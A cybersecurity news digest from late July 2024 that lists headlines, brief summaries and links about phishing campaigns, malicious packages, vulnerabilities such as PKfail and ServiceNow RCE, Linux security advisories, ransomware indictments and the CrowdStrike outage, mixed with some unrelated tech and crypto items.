Specialized press news

Hackers Abuse Microsoft Office Forms to Launch Two-Step Phishing Attacks
Cybercriminals are increasingly using Microsoft Office Forms to launch sophisticated two-step phishing attacks. Users are being tricked into divulging their Microsoft 365 (M365) login credentials through Office Forms. Threat actors use the technique known as “external account takeover” or vendor email compromise to launch two-step phishing attacks throughout supply chains, using the email […]
https://cybersecuritynews.com/two-step-phishing-attacks/

Beware Of Malicious Chrome Installer From Chinese Hackers
A malicious Chrome installer, ChromeSetup.msi, distributed via drive-by download, delivers a novel Gh0st RAT variant, dubbed Gh0stGambit, that evasively retrieves and executes encrypted payloads. The RAT is a modified open-source variant targeting Chinese-speaking users with data theft and evasion capabilities, building on the long-standing Gh0st RAT, notorious for its use in cyber espionage operations, demonstrating continued […]
https://cybersecuritynews.com/malicious-chrome-installer-alert/

Threat Actors Exploiting Selenium Grid Services For Cryptomining
Threat actors often exploit cloud services for cryptomining, because doing so lets them abuse large computational resources and maximize their mining output without bearing the cost. Cybersecurity analysts at Wiz recently identified that threat actors have been actively exploiting Selenium Grid services for cryptomining. Selenium Grid […]
https://cybersecuritynews.com/threat-actors-exploiting-selenium-grid-cryptomining/

French Authorities Launch Operation to Remove PlugX Malware from Infected Systems
French judicial authorities, in collaboration with Europol, have launched a so-called "disinfection operation" to rid compromised hosts of a known malware called PlugX. The Paris Prosecutor's Office, Parquet de Paris, said the initiative was launched on July 18 and that it's expected to continue for "several months." It further said around a hundred victims located in France, Malta, Portugal,
https://thehackernews.com/2024/07/french-authorities-launch-operation-to.html

Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials
Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that targets Apple macOS systems with the goal of stealing users' Google Cloud credentials from a narrow pool of victims. The package, named "lr-utils-lib," attracted a total of 59 downloads before it was taken down. It was uploaded to the registry in early June 2024. "The malware uses a
https://thehackernews.com/2024/07/malicious-pypi-package-targets-macos-to.html

Fedora 40: darkhttpd 2024-25f8e34407 Security Advisory Updates
Update to 1.16 fixes rhbz#2259096
https://linuxsecurity.com/advisories/fedora/fedora-40-darkhttpd-2024-25f8e34407-security-advisory-updates-bxcgqczmxua4

Fedora 40: python-scrapy 2024-c27b82d702 Security Advisory Updates
Update to 2.11.2
https://linuxsecurity.com/advisories/fedora/fedora-40-python-scrapy-2024-c27b82d702-security-advisory-updates-w2wnxne6jyiu

General press news

Clay County reopens more offices following cyber attack - YouTube
Clay County reopens more offices following cyber attack (video, WTWO WAWV TV).
https://www.youtube.com/watch?v=aQHkuirGZ3U

Optimizing neural networks using spider monkey optimization algorithm for intrusion detection system
From common tactics employed by cybercriminals to sophisticated state-sponsored campaigns, each form of cyber-attack presents unique challenges and ...
https://www.nature.com/articles/s41598-024-68342-6

Paris Olympics: Massive Cyber Attack & Bomb Threat Put USA Basketball's Gameday Travel ...
Paris Olympics: Massive Cyber Attack & Bomb Threat Put USA Basketball's Gameday Travel Plans at Risk. ByAnuj Talwalkar. Jul 26, 2024 | 10:25 AM EDT.
https://www.essentiallysports.com/nba-active-basketball-news-paris-olympics-massive-cyber-attack-bomb-threat-put-usa-basketballs-gameday-travel-plans-at-risk/

Cyber security threats ramp up; so do efforts to tamp down - WIBW
He says diversifying ...
https://www.wibw.com/2024/07/26/cyber-security-threats-ramp-up-so-do-efforts-tamp-down/

Yesterday's news (specialized press)

A bug in Chrome Password Manager caused user credentials to disappear
Google has addressed a bug in Chrome's Password Manager that caused user credentials to disappear temporarily. The roughly 18-hour outage hit Chrome's Password Manager on Wednesday, affecting users who rely on the tool to store and […]
https://securityaffairs.com/166200/security/chrome-password-manager-bug.html

Crooks Bypassed Google's Email Verification to Create Workspace Accounts, Access 3rd-Party Services
Google says it recently fixed an authentication weakness that allowed crooks to circumvent email verification needed to create a Google Workspace account, and leverage that to impersonate a domain holder to third-party services that allow logins through Google's "Sign in with Google" feature.
https://krebsonsecurity.com/2024/07/crooks-bypassed-googles-email-verification-to-create-workspace-accounts-access-3rd-party-services/

Here's Why It's Time to Wake Up Again…
Uncertainty regarding the U.S. elections is in front of us, and given the many events that unfolded this month, I think we can expect plenty of more volatility where investors will be “trading the election” until we see the results in November.
https://hackernoon.com/heres-why-its-time-to-wake-up-again?source=rss

Millions of Devices Vulnerable to 'PKFail' Secure Boot Bypass Issue
Several vendors for consumer and enterprise PCs share a compromised crypto key that should never have been on the devices in the first place.
https://www.darkreading.com/endpoint-security/millions-of-devices-vulnerable-to-pkfail-secure-boot-bypass-issue

MEET48 "2024 GIPR2" Voting Event Final Results On August 3rd, Ranking Top On DappBay And DappRadar
The "2024 GIPR2" voting event Dapp of MEET48 has rapidly risen in the rankings on DappBay and DappRadar. The final voting rankings will determine the metaverse and overseas offline performance resources that participants will receive. The total accumulated votes in the event have exceeded 10 million.
https://hackernoon.com/meet48-2024-gipr2-voting-event-final-results-on-august-3rd-ranking-top-on-dappbay-and-dappradar?source=rss

Lessons from HackerOne's First Recharge Week

https://www.hackerone.com/culture-and-talent/lessons-hackerones-first-recharge-week

CrowdStrike Outage Losses Estimated at a Staggering $5.4B
Researchers track the healthcare sector as experiencing the biggest financial losses, with banking and transportation following close behind.
https://www.darkreading.com/cybersecurity-operations/crowdstrike-outage-losses-estimated-staggering-54b

Targeted PyPi Package Steals Google Cloud Credentials from macOS Devs
The campaign is laser-targeted, bucking the trend of "spray-and-pray" malicious open source packages turning up in code repositories seemingly every other day.
https://www.darkreading.com/threat-intelligence/targeted-pypi-package-steals-google-cloud-credentials-macos-devs

Kwenta And Perennial: How They Are Kickstarting the Arbitrum Expansion With 1.9M ARB
Kwenta, the leading onchain perpetuals exchange on the Optimism network, has partnered with Perennial to launch a new product and incentive program on the Arbitrum network. The initiative, backed by a substantial 1.9 million ARB grant, aims to attract new users and liquidity providers to Arbitrum.
https://hackernoon.com/kwenta-and-perennial-how-they-are-kickstarting-the-arbitrum-expansion-with-19m-arb?source=rss

Crypto exchange Gemini discloses third-party data breach
Cryptocurrency exchange Gemini is warning it suffered a data breach incident caused by a cyberattack at its Automated Clearing House (ACH) service provider, whose name was not disclosed. [...]
https://www.bleepingcomputer.com/news/security/crypto-exchange-gemini-discloses-third-party-data-breach/

Google fixes Chrome Password Manager bug that hides credentials
Google has fixed a bug in Chrome's Password Manager that caused user credentials to disappear temporarily for more than 18 hours. [...]
https://www.bleepingcomputer.com/news/google/google-fixes-chrome-password-manager-bug-that-hides-credentials/

openSUSE: 2024:0223-1 important: opera Advisory Security Update
An update that fixes 29 vulnerabilities is now available.
https://linuxsecurity.com/advisories/opensuse/opensuse-2024-0223-1-important-opera-advisory-security-update-rnsqrxvdtwqx

FBCS data breach impact now reaches 4.2 million people
Debt collection agency Financial Business and Consumer Solutions (FBCS) has again increased the number of people impacted by a February data breach, now saying it affects 4.2 million people in the US. [...]
https://www.bleepingcomputer.com/news/security/fbcs-data-breach-impact-now-reaches-42-million-people/

Companies Struggle to Recover From CrowdStrike's Crippling Falcon Update
The cybersecurity firm says that 97% of sensors are back online, but some organizations continue to recover, with costs tallied at $5.4 billion for the Fortune 500 alone.
https://www.darkreading.com/cybersecurity-operations/companies-struggle-to-recover-from-crowdstrike-crippling-falcon-update

US Offers $10M Reward for Information on North Korean Hacker
The individual is part of a DPRK-backed group known as Andariel, which is known for using the 'Maui' ransomware strain to target and extort healthcare entities.
https://www.darkreading.com/threat-intelligence/us-offers-10m-reward-for-information-on-north-korean-hacker

Metasploit Weekly Wrap-Up 07/26/2024
New module content (3). Magento XXE Unserialize Arbitrary File Read. Authors: Heyder and Sergey Temnikov. Type: Auxiliary. Pull request: #19304, contributed by heyder. Path: gather/magento_xxe_cve_2024_34102. AttackerKB reference: CVE-2024-34102. Description: This adds an auxiliary module for an XXE which results in an arbitrary file read in Magento
https://blog.rapid7.com/2024/07/26/metasploit-weekly-wrap-up-41/

Finding Threats Efficiently: Q&A with Todd Willoughby, Director of Security & Privacy, RSM Defense.
Here are four reasons why an on-premises deployment might be the right choice for your organization. – Stephen Salinas, Head of Product Marketing, Stellar Cyber. San Jose, Calif. – Jul. 26, 2024. Every organization has masses of data, and sifting through it to reveal cybersecurity
https://cybersecurityventures.com/stellar-cyber-qa/

Nvidia Embraces LLMs & Commonsense Cybersecurity Strategy
Nvidia doesn't just make the chips that accelerate a lot of AI applications — the company regularly creates and uses its own large language models, too.
https://www.darkreading.com/cyber-risk/nvidia-embraces-llms-and-commonsense-cybersecurity-strategy

July Windows Server updates break Remote Desktop connections
Microsoft has confirmed that July's security updates break remote desktop connections in organizations where Windows servers are configured to use the legacy RPC over HTTP protocol in the Remote Desktop Gateway. [...]
https://www.bleepingcomputer.com/news/microsoft/july-windows-server-updates-break-remote-desktop-connections/

Researchers Warn of Increased Cyberterrorism Activity Targeting Paris Olympics
Cyberterrorism is on the rise, posing a significant threat to global events like the Paris Olympics and elections,…
https://hackread.com/increased-cyberterrorism-activity-paris-olympics-warn/

Empowering Change: SI3's "Granting Access" Event Boosts Diversity in Web3
SI3, an organization championing women and non-binary individuals in the Web3 space, has announced its inaugural "Granting Access" event. The virtual gathering will connect participants with grant funding opportunities at major blockchain and protocol organizations. The event will kick off with a keynote presentation by Kara Howard, Co-Creator of SI3 and the Si Her Co-Active.
https://hackernoon.com/empowering-change-si3s-granting-access-event-boosts-diversity-in-web3?source=rss

Modern Terms and Concepts for a Zero Trust Mindset
When Zero Trust was first coined by John Kindervag in 2009, it challenged the “trust but verify” approach of traditional security models. At the time, Zero Trust required us to challenge the assumption that trust is implicit. Especially with the complex networks, systems, and services that we see in today's vast digital supply chain, trust cannot be assumed at any level. As digital and operational infrastructure has evolved, so have the concepts for implementing Zero Trust. The phrase Zero...
https://cloudsecurityalliance.org/articles/modern-terms-and-concepts-for-a-zero-trust-mindset

Acronis warns of Cyber Infrastructure default password abused in attacks
​Acronis warned customers to patch a critical Cyber Infrastructure security flaw that lets attackers bypass authentication on vulnerable servers using default credentials. [...]
https://www.bleepingcomputer.com/news/security/acronis-warns-of-cyber-infrastructure-default-password-abused-in-attacks/

Omnity Network Launches Omnity AI
Omnity AI is an AI-powered multichain protocol for distributing tokens on social media. Anyone (Grant Makers) can create a Grant (with crypto tokens) to invite social media activity (from Grant Takers). The first Omnity AI agent, xAgent, uses LLM (Large Language Model) natural language processing to determine and distribute grants.
https://hackernoon.com/omnity-network-launches-omnity-ai?source=rss

openSUSE: 2024:0222-1 important: python-nltk Advisory Security Update
An update that fixes one vulnerability is now available.
https://linuxsecurity.com/advisories/opensuse/opensuse-2024-0222-1-important-python-nltk-advisory-security-update-thpeysogqf5g

The Noonification: Last Mile of Blockchains: RPC and Node-as-a-Service (7/26/2024)
How are you, hacker? What's happening in tech this week: The Noonification by HackerNoon has got you covered with fresh content from our top 5 stories of the day, every day at noon your local time. Last Mile of Blockchains: RPC and Node-as-a-Service, by @blockchainize (5 min read): This paper surveys methods for accessing blockchains, comparing full nodes and third-party services based on integrity, availability, and privacy. 4 Tactics SaaS Products Use to Nudge Users to Upgrade, by @alexdebecker (2 min read): Learn how the best-in-class SaaS products nudge their users to upgrade to a (higher) paid plan. Tactics from Buffer, Beehiiv, Grammarly, and more. Write on Interaction, Reputation, or Trust, Win up to 00 in Prizes...
https://hackernoon.com/7-26-2024-noonification?source=rss

Npm packages conceal macOS malware in 'travis.yml' files, drop bogus "Safari Updates"
Three npm packages identified by Sonatype this week conceal malware in "travis.yml," a CI/CD build configuration file used by Travis CI. These packages contain metadata, description, and code copied from the legitimate "cli-width" package but instead deploy a malicious macOS binary disguised as "Safari updates."
https://www.sonatype.com/blog/npm-packages-use-travis.yml-files-to-conceal-macos-malware-disguised-as-safari-updates

Ubuntu 6919-1: Linux kernel Security Advisory Updates
Several security issues were fixed in the Linux kernel.
https://linuxsecurity.com/advisories/ubuntu/ubuntu-6919-1-linux-kernel-security-advisory-updates-tfbtapxqkqgc

Meta takes down 63,000 sextortion-related accounts on Instagram
Meta has taken down a whopping number of Instagram accounts directly involved in sextortion and more accounts aimed at training scammers
https://www.malwarebytes.com/blog/news/2024/07/meta-takes-down-63000-sextortion-related-accounts-on-instagram

USN-6919-1: Linux kernel vulnerabilities
Ziming Zhang discovered that the DRM driver for VMware Virtual GPU did not properly handle certain error conditions, leading to a NULL pointer dereference. A local attacker could possibly trigger this vulnerability to cause a denial of service. (CVE-2022-38096) It was discovered that the ATA over Ethernet (AoE) driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2023-6270) It was discovered that the Atheros 802.11ac wireless driver did not properly validate certain data structures, leading to a NULL pointer dereference. An attacker could possibly use this to cause a denial of service. (CVE-2023-7042) It was discovered that the HugeTLB file system...
https://ubuntu.com/security/notices/USN-6919-1

Augmented Tree Data Structures
Data structures are a serious tool for storing data conveniently. Modern applications have the flexibility to organize data in memory or on disk using various methods. Some augmentations improve application performance; others compress the data held in memory.
https://hackernoon.com/augmented-tree-data-structures?source=rss

Court Reveals Wright's 2024 MYOB Email Was Manipulated to Support False Claims
Dr. Wright's MYOB Ontier email, supposedly from December 2019, was forged on 18 February 2024. The email was created to falsely support his claim that he provided MYOB login details in 2019. Expert analysis and court findings confirm the email was manipulated to back up Dr. Wright's false testimony.
https://hackernoon.com/court-reveals-wrights-2024-myob-email-was-manipulated-to-support-false-claims?source=rss

Ubuntu 6918-1: Linux kernel Security Advisory Updates
Several security issues were fixed in the Linux kernel.
https://linuxsecurity.com/advisories/ubuntu/ubuntu-6918-1-linux-kernel-security-advisory-updates-j3weif3e9ttx

Debunking Craig Wright's Sartre Message
In May 2016, Dr. Craig Wright tried to prove he was Satoshi Nakamoto using the "Sartre Message." COPA alleges the message's signature was taken from a 2009 Bitcoin transaction and repurposed, exposing Wright's clumsy attempt at forgery.
https://hackernoon.com/debunking-craig-wrights-sartre-message?source=rss

USN-6918-1: Linux kernel vulnerabilities
It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel when modifying certain settings values through debugfs. A privileged local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - ARM64 architecture; - RISC-V architecture; - S390 architecture; - x86 architecture; - Block layer subsystem; - Compute Acceleration Framework; - Accessibility subsystem; - Android drivers; - Drivers core; - Bluetooth drivers; - Clock framework and drivers; - Data acquisition framework and drivers; - Cryptographic API; - Buffer Sharing and Synchronization framework; ...
https://ubuntu.com/security/notices/USN-6918-1

Russian ransomware gangs account for 69% of all ransom proceeds
Russian-speaking threat actors accounted for at least 69% of all crypto proceeds linked to ransomware throughout the previous year, exceeding $500,000,000. [...]
https://www.bleepingcomputer.com/news/security/russian-ransomware-gangs-account-for-69-percent-of-all-ransom-proceeds/

Holodeck Heroes: Building AI Companions for the Final Frontier
This article is the third in the series of future technology articles—this one focusing on Large Language Models (LLMs) and how they're revolutionizing human-computer interactions.
https://hackernoon.com/holodeck-heroes-building-ai-companions-for-the-final-frontier?source=rss

COPA takes Craig Wright to Court for Impersonating Satoshi Nakamoto with Forged Emails
COPA alleges Dr. Craig Wright forged a January 2014 email from "Satoshi Nakamoto" to support his claim of being Bitcoin's creator. Forensic evidence ties the email to Wright's computer, contradicting his explanations and suggesting deliberate fabrication.
https://hackernoon.com/copa-takes-craig-wright-to-court-for-impersonating-satoshi-nakamoto-with-forged-emails?source=rss

Balancing Blockchain Access: Local Nodes vs. Third-Party Services
The choice between running a local full node and relying on third-party services for blockchain access involves trade-offs in cost and security. Full nodes offer the best integrity, availability, and privacy but are expensive. Third-party services can be cost-effective but often lack data integrity guarantees and face availability issues. Emerging ultralight nodes offer a promising solution with reduced hardware requirements and verifiable data. Ensuring blockchain accessibility in a secure manner is crucial for the future of Web3 technology and its widespread adoption.
https://hackernoon.com/balancing-blockchain-access-local-nodes-vs-third-party-services?source=rss

Distributing Security Responsibilities (Responsibly)
Outlining the wider organization's proactive role in fortifying the security program allows the security team to focus on the most pressing issues that only they can solve.
https://www.darkreading.com/vulnerabilities-threats/distributing-security-responsibilities-responsibly

USN-6917-1: Linux kernel vulnerabilities
Ziming Zhang discovered that the DRM driver for VMware Virtual GPU did not properly handle certain error conditions, leading to a NULL pointer dereference. A local attacker could possibly trigger this vulnerability to cause a denial of service. (CVE-2022-38096) Gui-Dong Han discovered that the software RAID driver in the Linux kernel contained a race condition, leading to an integer overflow vulnerability. A privileged attacker could possibly use this to cause a denial of service (system crash). (CVE-2024-23307) It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel when modifying certain settings values through debugfs. A privileged local attacker could use this to cause a denial of service. (CVE-2024-24857, CVE-2024-24858, CVE-2024-24859) Bai Jiaju...
https://ubuntu.com/security/notices/USN-6917-1

Could Intel Have Fixed Spectre & Meltdown Bugs Earlier?
Intel works closely with academic researchers on hardware flaws and coordinates efforts with other vendors to roll out fixes for emerging vulnerabilities. That wasn't always the case.
https://www.darkreading.com/vulnerabilities-threats/could-intel-have-fixed-meltdown-spectre-earlier

New cyber security training packages launched to manage supply chain risk
NCSC publishes free e-learning to help organisations manage the cyber security risks across their supply chains.
https://www.ncsc.gov.uk/blog-post/new-cyber-security-training-packages-launched-to-manage-supply-chain-risk

Key Takeaways From The Take Command Summit: Command Your Cloud
The Cloud security landscape is constantly changing. During the "Command Your Cloud" session at the Rapid7 Take Command Summit, industry experts Ryan Blanchard, Jeffrey Gardner and Devin Krugly shared vital strategies for staying ahead of that constant change.
https://blog.rapid7.com/2024/07/26/key-takeaways-from-the-take-command-summit-command-your-cloud/

This AI-Powered Cybercrime Service Bundles Phishing Kits with Malicious Android Apps
A Spanish-speaking cybercrime group named GXC Team has been observed bundling phishing kits with malicious Android applications, taking malware-as-a-service (MaaS) offerings to the next level. Singaporean cybersecurity company Group-IB, which has been tracking the e-crime actor since January 2023, described the crimeware solution as a "sophisticated AI-powered phishing-as-a-service platform"
https://thehackernews.com/2024/07/spanish-hackers-bundle-phishing-kits.html

CVE-2024-6922: Automation Anywhere Automation 360 Server-Side Request Forgery
Automation 360 Robotic Process Automation suite v21-v32 is vulnerable to unauthenticated Server-Side Request Forgery (SSRF).
https://blog.rapid7.com/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/

Cybersecurity Mesh: The Future Of Network Defense
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full Forbes Story. Sausalito, Calif. – Jul. 26, 2024. It's shocking to hear that by 2025, cybercrime will cost the world economy $10.5 trillion annually — a 15 percent year-over-year increase since 2021, according to
https://cybersecurityventures.com/cybersecurity-mesh-the-future-of-network-defense/

Linux Mint 22: Elevating Security and Usability for Admins
Linux Mint has long been recognized as a versatile and user-friendly distribution and has earned great popularity among administrators and security practitioners. Due to its stability, ease of use, and robust support system, the distro has quickly established itself in professional environments where reliability and performance are crucial.
https://linuxsecurity.com/news/desktop-security/linux-mint-22-elevating-security-and-usability-for-admins

Sheltering from the Cyberattack Storm
As we move towards the summer and the promise of sunnier weather, it's worth noting that the cybersecurity industry has seen more rain than sunshine recently. A slew of high-profile...
https://www.cyberdefensemagazine.com/sheltering-from-the-cyberattack-storm/

Google Chrome Modifies Privacy Sandbox To Allow Cookies
After much progress with Privacy Sandbox, Google has decided to roll back its most privacy-focused…
https://latesthackingnews.com/2024/07/26/google-chrome-modifies-privacy-sandbox-to-allow-cookies/

ServiceNow Flaw Let Remote Attackers Execute Arbitrary Code
ServiceNow recently disclosed three vulnerabilities (CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178), two of them rated critical, affecting multiple Now Platform versions and allowing unauthenticated remote code execution and unauthorized file access. The vulnerabilities, with CVSS scores ranging from 6.9 to 9.3, pose significant risks of data theft, system compromise, and operational disruption. Active exploitation attempts by foreign threat actors targeting both private […]
https://cybersecuritynews.com/servicenow-rce-vulnerability/

ConfusedFunction Vulnerability in Google Cloud Platform Let Attackers Escalate Privileges
A newly discovered vulnerability in Google Cloud Platform (GCP) has raised significant security concerns among users and experts alike. The vulnerability, dubbed “ConfusedFunction,” involves GCP's Cloud Functions and Cloud Build services, potentially allowing attackers to escalate privileges and gain unauthorized access to various GCP services. Tenable Research, the cybersecurity firm that uncovered this flaw, has […]
https://cybersecuritynews.com/confusedfunction-vulnerability-google/

BIND updates fix four high-severity DoS bugs in the DNS software suite
The Internet Systems Consortium (ISC) released BIND security updates that fix four high-severity, remotely exploitable DoS vulnerabilities in the DNS software suite. An attacker can exploit these vulnerabilities to disrupt DNS services. […]
https://securityaffairs.com/166190/security/bind-updates-high-severity-dos-bugs.html

Offensive AI: The Sine Qua Non of Cybersecurity
"Peace is the virtue of civilization. War is its crime. Yet it is often in the furnace of war that the sharpest tools of peace are forged." - Victor Hugo. In 1971, an unsettling message started appearing on several computers that comprised ARPANET, the precursor to what we now know as the Internet. The message, which read "I'm the Creeper: catch me if you can." was the output of a program named
https://thehackernews.com/2024/07/offensive-ai-sine-qua-non-of.html

US Charges North Korean Hacker for Ransomware Attacks on Hospitals
The North Korean hacker, Rim Jong Hyok, is accused of being part of the government-backed cyberespionage group Andariel,…
https://hackread.com/us-charges-north-korean-hacker-ransomware-attacks-hospitals/

Scam Attacks Taking Advantage of the Popularity of the Generative AI Wave
A direct correlation between GenAI's explosive popularity and scam attacks is addressed in this article, using plentiful data and a case study of network abuse. The post Scam Attacks Taking Advantage of the Popularity of the Generative AI Wave appeared first on Unit 42.
https://unit42.paloaltonetworks.com/cybersquatting-using-genai-keywords/

U.S. DoJ Indicts North Korean Hacker for Ransomware Attacks on Hospitals
The U.S. Department of Justice (DoJ) on Thursday unsealed an indictment against a North Korean military intelligence operative for allegedly carrying out ransomware attacks against healthcare facilities in the country and funneling the payments to orchestrate additional intrusions into defense, technology, and government entities across the world. "Rim Jong Hyok and his co-conspirators deployed
https://thehackernews.com/2024/07/us-doj-indicts-north-korean-hacker-for.html

PKfail Vulnerability Allows Hackers to Install UEFI Malware on Over 200 Device Models
The PKfail vulnerability is a significant security issue affecting over 200 device models of Secure Boot. PKfail is a critical firmware supply-chain issue that undermines the Secure Boot process in the UEFI ecosystem. Secure Boot ensures that only trusted software is loaded during the boot process, preventing unauthorized code execution. However, PKfail compromises this security […] The post PKfail Vulnerability Allows Hackers to Install UEFI Malware on Over 200 Device Models appeared first on Cyber Security News.
https://cybersecuritynews.com/pkfail-vulnerability/

OpenStack Nova Vulnerability Allows Hackers Gain Unauthorized Access to Cloud Servers
A vulnerability in OpenStack’s Nova component has been identified, potentially allowing hackers to gain unauthorized access to cloud servers. This vulnerability, tracked as CVE-2024-40767, affects multiple versions of Nova and poses a serious risk to cloud infrastructure worldwide. CVE-2024-40767 – OpenStack Nova Vulnerability: Arnaud Morin of OVH discovered the vulnerability, which affects Nova versions less than […] The post OpenStack Nova Vulnerability Allows Hackers Gain Unauthorized Access to Cloud Servers appeared first on Cyber Security News.
https://cybersecuritynews.com/openstack-nova-vulnerability/

Terrorist Activity is Accelerating in Cyberspace – Risk Precursor to Summer Olympics and Elections
Terrorist groups are increasingly using cyberspace and digital communication channels to plan and execute attacks. Yesterday, Federal Bureau of Investigation (FBI) Director Christopher Wray expressed growing concerns over the potential for a coordinated foreign terrorist attack in the United States. During his testimony to the House Oversight Committee, Mr. Wray cited the ISIS-K attack on […]
https://securityaffairs.com/166179/breaking-news/terrorist-activity-alarm-terrorist-attacks.html

Ongoing Cyberattack Targets Exposed Selenium Grid Services for Crypto Mining
Cybersecurity researchers are sounding the alarm over an ongoing campaign that's leveraging internet-exposed Selenium Grid services for illicit cryptocurrency mining. Cloud security firm Wiz is tracking the activity under the name SeleniumGreed. The campaign, which targets older versions of Selenium (3.141.59 and prior), is believed to have been underway since at least April 2023. "Unbeknownst to
https://thehackernews.com/2024/07/ongoing-cyberattack-targets-exposed.html

CrowdStrike Warns of New Phishing Scam Targeting German Customers
CrowdStrike is alerting about an unfamiliar threat actor attempting to capitalize on the Falcon Sensor update fiasco to distribute dubious installers targeting German customers as part of a highly targeted campaign. The cybersecurity company said it identified what it described as an unattributed spear-phishing attempt on July 24, 2024, distributing an inauthentic CrowdStrike Crash Reporter
https://thehackernews.com/2024/07/crowdstrike-warns-of-new-phishing-scam.html

Critical Flaw in Telerik Report Server Poses Remote Code Execution Risk
Progress Software is urging users to update their Telerik Report Server instances following the discovery of a critical security flaw that could result in remote code execution. The vulnerability, tracked as CVE-2024-6327 (CVSS score: 9.9), impacts Report Server version 2024 Q2 (10.1.24.514) and earlier. "In Progress Telerik Report Server versions prior to 2024 Q2 (10.1.24.709), a remote code
https://thehackernews.com/2024/07/critical-flaw-in-telerik-report-server.html

Changing the Passive to Active: Updating SaaS Cybersecurity Strategy with Threat Management
The massive Snowflake breach disclosed recently, involving hundreds of millions of stolen customer records, is a stark wake-up call for organizations to proactively manage their SaaS security. No doubt the... The post Changing the Passive to Active: Updating SaaS Cybersecurity Strategy with Threat Management appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/changing-the-passive-to-active-updating-saas-cybersecurity-strategy-with-threat-management/

North Korean Charged in Cyberattacks on US Hospitals, NASA & Military Bases
A North Korean military intelligence operative has been indicted for orchestrating a series of cyberattacks targeting U.S. hospitals, NASA, and military bases, federal prosecutors announced on Thursday. Rim Jong Hyok, a member of the Andariel Unit within North Korea’s Reconnaissance General Bureau, faces charges of conspiracy to commit computer hacking and money laundering. The indictment, […] The post North Korean Charged in Cyberattacks on US Hospitals, NASA & Military Bases appeared first on Cyber Security News.
https://cybersecuritynews.com/north-korean-hacker-charged/

LummaC2 Malware Abusing the Game Platform ‘Steam'
LummaC2 is an Infostealer that is being actively distributed, disguised as illegal programs (e.g. cracks, keygens, and game hacking programs) available from distribution websites, YouTube, and LinkedIn using the SEO poisoning technique. Recently, it has also been distributed via search engine ads, posing as web pages of Notion, Slack, Capcut, etc. The malware’s execution method has been constantly changing, with the current versions distributed either as a single EXE file or as a compressed file containing a malicious DLL and... The post LummaC2 Malware Abusing the Game Platform ‘Steam’ appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/68309/

Yesterday's News (Press)

State Treasurer's Office Raises Local Agency Cybersecurity Alarms - Industry Insider
A thwarted cyber attack against the Local Agency Investment Fund has the State Treasurer's Office warning local governments to review their ...
https://insider.govtech.com/california/news/state-treasurers-office-raises-local-agency-cybersecurity-alarms

Georgia Today: Cyber attack suspect indicted; Athens to Savannah bike trail; Braves are Wild Card
Georgia Today: Cyber attack suspect indicted; Athens to Savannah bike trail; Braves are Wild Card. July 26, ...
https://www.gpb.org/news/2024/07/26/georgia-today-cyber-attack-suspect-indicted-athens-savannah-bike-trail-braves-are

Watch Paris Trains Hit By 'Massive' Sabotage Ahead of Olympics - Bloomberg.com
On the eve of the Olympics, trains across France have been disrupted. The country's Transport Minister Patrice Vergriete says "Coordinated ...
https://www.bloomberg.com/news/videos/2024-07-26/paris-trains-hit-by-massive-sabotage-ahead-of-olympics-video

Dutchess County Earns Top-Ten Ranking for 22nd Consecutive Year
While the recent CrowdStrike shutdown was not a cyber-attack, malicious actors capitalized on the incident, attempting to obtain login credentials ...
https://www.dutchessny.gov/Departments/County-Executive/Dutchess-County-Earns-Top-Ten-Ranking-22nd-Consecutive-Year.htm

CrowdStrike IT Outage: Wave of Business Interruption Claims Expected | HUB | K&L Gates
Most cyber-policies provide for written notice to be given as soon as practicable, or within a specified time period, of any cyber-attack or incident ...
https://www.klgates.com/CrowdStrike-IT-Outage-Wave-of-Business-Interruption-Claims-Expected-7-26-2024

Scotiabank resolves technical issue impacting thousands of its customers - Reuters
https://www.reuters.com/business/finance/thousands-scotiabank-customers-impacted-by-technical-issue-2024-07-26/

Jefferson County Clerk's Offices to reopen Saturday following cyber attack - MSN
LOUISVILLE, Ky. (WAVE) - Jefferson County Clerk's Office branches will reopen Saturday after a cyber attack shut down operations for almost four ...
https://www.msn.com/en-us/news/other/jefferson-county-clerk-s-offices-remain-closed-after-cyber-attack/ar-BB1qDc88%3Focid%3DBingNewsVerp

Orion raises R44m with SA investors taking lionshare - Miningmx
https://www.miningmx.com/top-story/57728-orion-raises-r44m-with-sa-investors-taking-the-lionshare/

News from Two Days Ago (Specialized Press)

Top 4 Use Cases of Non-Human Identity Security: Live Event Recap
Originally published by Astrix on June 13, 2024. Last week we held an insightful live event featuring our solutions engineer, Michael Silva, and our CISO in Residence, Tim Youngblood. The event focused on the top four non-human identity (NHI) use cases that are crucial for security teams. Here's a recap of the key points discussed during the session, as well as the recording of the full event. Use case 1: Lifecycle management. The first use case we discussed was Lifecycle Management. Tim and Mich...
https://cloudsecurityalliance.org/articles/top-4-use-cases-of-non-human-identity-security-live-event-recap

Navigating Data Privacy in the Age of AI: How to Chart a Course for Your Organization
Originally published by BARR Advisory. Artificial intelligence (AI) raises significant data privacy concerns due to its ability to collect, analyze, and utilize vast amounts of personal information. So what role do companies that have implemented AI play in keeping user data secured? Let's dive in. One of the main concerns with AI is the potential for unauthorized access to and misuse of sensitive data. As AI algorithms rely heavily on data to function, there is a risk that personal information...
https://cloudsecurityalliance.org/articles/navigating-data-privacy-in-the-age-of-ai-how-to-chart-a-course-for-your-organization

PKfail Secure Boot bypass lets attackers install UEFI malware
Hundreds of UEFI products from 10 vendors are susceptible to compromise due to a critical firmware supply-chain issue known as PKfail, which allows attackers to bypass Secure Boot and install malware. [...]
https://www.bleepingcomputer.com/news/security/pkfail-secure-boot-bypass-lets-attackers-install-uefi-malware/

Mimecast Joins Human Risk Management Fray With Code42 Deal
Mimecast's acquisition of Code42 helps the company move into insider risk management, joining key rival Proofpoint and others in the space.
https://www.darkreading.com/insider-threats/mimecast-joins-human-risk-management-fray-with-code42-deal

Critical ServiceNow RCE flaws actively exploited to steal credentials
Threat actors are chaining together ServiceNow flaws using publicly available exploits to breach government agencies and private firms in data theft attacks. [...]
